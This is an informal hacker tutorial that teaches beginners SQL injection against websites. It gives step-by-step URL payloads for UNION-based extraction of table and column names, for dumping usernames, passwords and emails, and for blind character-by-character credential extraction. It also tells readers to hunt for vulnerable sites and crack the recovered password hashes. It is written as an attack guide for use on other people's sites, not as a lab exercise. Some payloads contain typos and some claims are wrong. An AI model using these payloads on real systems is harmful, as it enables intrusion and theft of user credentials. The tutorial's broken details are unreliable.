p00l_b0y SQLi

1. This is a beginners tutorial for SQL Injection written by
2. p00l_b0y :)
3.  
4. SQL stands for Structured Query Language and its a programming
5. language designed by IBM that basically stores data for a server
6. in a table, similar to using a table in spreadsheets. It is how the server
7. will store the data. We can manipulate the database a website
8. is using to store content using SQL injection, or as i will
9. call it, sqli. The databases may contain usernames,user passwords,
10. news articles, emails, and much more.. anything the server is storing.
11.  
12. First you need to find a vulnerable site. There are tons of tools
13. that can tell you if its vuln or not, but i will teach how to
14. do it without a program, so you can understand it :)
15. First you need to find out what features the database is using,
16. like searches, registration or GET pages..
17. this is what we will use, GET. Here is an example of how GET works...
18.  
19. http://example.com/index.php?page=1.
20.  
21. The '?' followed by a name and then a value is what is known as a GET.
22. The GET here is telling the server to grab all the
23. info under the name "1" and to display it on the web-page.
24. So to get the data from "1" it must look it up in a database
25. to show this info on the webpage so now we need to get this
26. data from the database to see if its vuln. We can check by
27. typing this...
28.  
29. http://example.com?page=1--
30.  
31. IF there is an error displayed then we can continue because
32. this would tell an sql server to ignore the last tick.If
33. there is no error then find another website. Also
34. if it doesn't display anything then that doesn't mean
35. its not vuln.
36.  
37.  
38. there are several programs to use for sqli, the most popular are
39. Havij, and SQLmap.
40.  
41. NOTE:
42. In this tutorial, i am not going to show you how to use a specific
43. program, i am just going to show the basic outline of how sqli
44. works so you can understand it and use it yourself. I MIGHT write
45. a part 2 to this tut that shows how to use Havij, but i will see
46. how this one goes first :)
47.  
48.  
49. So there are three categories of data in a SQL database or server,
50. They are, databases, tables, and columns.
51. Databases contain tables, tables contain columns, columns
52. contain information, the information we want.
53.  
54.  
55. There are many different ways to get this info using differnet
56. type of sql injections.
57.  
58. -Blind sqli
59. -Signature Evasion
60. -Filter bypass
61. -poorly filtered strings
62. -incorrect type handling
63.  
64.  
65. The first from of sql i will discuss
66. in this tut is poorly filtered strings.
67. Poorly filtered strings means that the web master
68. did not do his job and didnt filter the GET info correctly, this
69. creates a vuln for sqli.Now we will inject the sql query by first finding
70. out how many columns it has.
71.  
72. Remember, databases contain tables, tables contain columns, columns
73. contain information, the information we want.
74.  
75. http://example.com?page=1 ORDER BY 1--
76. http://example.com?page=1 ORDER BY 2--
77. http://example.com?page=1 ORDER BY 3--
78. http://example.com?page=1 ORDER BY 4--
79.  
80. We have an error when we type ORDER BY 4--
81. so this tells us there is 3 columns of info, get it?
82.  
83. So we can combine the statements together with a
84. UNION statment, meaning combine them...
85.  
86. http://example.com?page=1 UNION ALL SELECT 1,2--
87.  
88. This will now display the number of columns in your
89. screen, the number is displays is the number we use
90. to exploit the site. Now we will need to see what version
91. of sql the target is using to see if its vuln...
92.  
93. http://example.com?page=1 UNION ALL SELECT 1,@@version--
94.  
95. this will display the version of the database.
96. if the version is above 5 that means it is a
97. mysql database and still may be vuln. In this
98. tutorial i will be exploiting column 1. Now we exploit
99. the data from the mysql database by typing this...
100.  
101. http://example.com?page=1 UNION ALL SELECT 1,table_name FROM information_schema.tables--
102.  
103. this will display the current tables that may have the info we want
104. so look for a table name that may have some precious info in it. Now we need to
105. get the column names in which the info is stored..
106. Remember, databases contain tables, tables contain columns, columns
107. contain information, the information we want.
108.  
109. http://example.com?page=1 UNION ALL SELECT 1,column)name FROM information_schema.columns WHERE table=[table]
110.  
111. replace [table] with the name of the table you want.
112. This should display all the columns in the table
113. so look for a column called id, username, password, email etc.
114. Passwords may be encrypted so use MD5 cracker to
115. view it as plain text :) type this to open the column of
116. a user and their password
117.  
118. http://example.com?page=1 UNION ALL SELECT 1,concat(username,0x3a,password,0x3a,email) FROM [table]--
119.  
120. So [table] is the table we are in, concat means
121. to group them together (username, password)
122. and 0x3a means ':' in hex so it displays
123. all the bits that have the username and password.
124. your output will look something like this...
125.  
126. username:password:email
127.  
128.  
129. The second form of sqli i will talk about in this
130. tut is blind sqli. Some web-masters might try
131. and hide then errors when you type
132.  
133. http://example.com?page=1--
134.  
135. So then we will use blind sqli :)
136. This is called a blind sqli attack because
137. you will not see any error messages, it is a
138. different technique. WE are going to use
139. benchmark() in this tut. so type this...
140.  
141. http://example.com?page=1
142. this should display the website, its true.
143.  
144. http://example.com?page=1 and 1=1
145. this should also display the website, its true.
146.  
147. http://example.com?page=1 and 1=2
148. this is not true, if it does not display the
149. website normally then its vuln :)
150. ( see how its called a blind sqli X) )
151.  
152. Again, we will check the version of the database...
153.  
154. http://example.com?page=1 substring(@@version,1,1)=5
155. So this will return true if the database is version 5.
156. NOTE: substring means part of a string...
157. So we will continue if its version 5
158.  
159. http://example.com/news.php?page=1 and (select 1 from mysql.user limit 0,1)=1
160. If this doesnt work then you will have find another
161. technique for blind sql, but if it works,
162. then you can get more info.
163.  
164. http://www.example.com/news.php?id=5 and (select 1 from [table] limit 0,1)=1
165. Since this is a blind sqli, you will have to guess
166. the table name, but web-masters are people too
167. so try users,members,emails, usernames, etc.
168. We are using limit 0,1 due to restrictions in the subselect.
169. SO the fun part comes up next,guessing more tables
170. and spamming the sql query :) FUN!
171.  
172. http://example.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>80
173. This will pull the first character from the first row of info,
174. then convert it to an ascii value and compare against the value 80.
175. If it comes back with true, use the 80. If its false then
176. decrease the value 80 until its true. Keep doing this till you come to
177. a point where an increase by 1 is true, and a decrease by 1 is false.
178. You know have your character. Use an ASCII chart from Google to help.
179.  
180. I will stop the tut here,its long enough.
181. I am tired as balls so if you want to learn more
182. ways of sqli like filter evasions and stuff, google it.
183. I might make a part 2 to this tut if you guys like it :)
184.  
185. We are legion.